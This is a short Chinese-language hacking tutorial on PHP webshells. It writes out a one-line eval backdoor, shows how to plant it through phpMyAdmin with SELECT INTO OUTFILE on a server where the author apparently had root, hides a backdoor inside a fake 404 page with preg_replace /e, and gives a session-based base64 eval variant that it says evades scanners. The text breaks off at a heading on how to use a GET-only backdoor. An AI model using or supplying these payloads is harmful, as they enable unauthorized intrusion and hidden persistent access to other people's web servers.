方法一,一句话木马
偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select'<?php @eval($_POST[-77]);?>'INTO OUTFILE 'E:\Web\wp-content\errors.php'
提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题
接着尝试:select'<?php @eval($_POST[-77]);?>'INTO OUTFILE 'E:\\Web\\xxx.xx.vn\\wp-content\\errors.php'
再次导入,提示成功,访问后发现真的成功了。
另一种一句话木马
服务器上发现被植了很多木马,而且还让人肆意使用...NND<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
利用404页面隐藏PHP小马:HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
404 Not FoundNot Found
The requested URL was not found on this server.
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。
无特征隐藏PHP一句话:<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。
超级隐蔽的PHP后门:
仅用GET函数就构成了木马;
利用方法: